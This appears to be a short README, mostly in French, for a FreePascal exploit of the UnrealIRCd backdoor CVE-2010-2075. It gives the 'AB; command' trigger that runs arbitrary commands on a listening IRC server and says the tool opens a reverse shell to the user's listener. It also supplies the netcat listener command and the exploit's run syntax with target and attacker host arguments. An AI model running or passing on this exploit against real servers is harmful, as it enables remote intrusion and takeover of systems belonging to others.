
FreePascal implementation of the UnrealIRCD CVE-2010-2075
Implémentation FreePascal du CVE-2010-2075
RCE en envoyant "AB; command" à n'importe quel service à l'écoute. Toute commande que vous envoyez est exécutée par le même utilisateur que celui sous lequel UnrealIRCD s'exécute.
Cette implémentation lance un reverse shell vers votre écouteur.
Démarrez un écouteur, ex. netcat -lvp 4444
Exécutez l'exploit ./exploit <target ip> <target port> <host ip> <host port> où l'ip et le port hôte sont ceux de votre écouteur.
Synapse. Si vous ne l'avez pas, installez-le via l'OPM.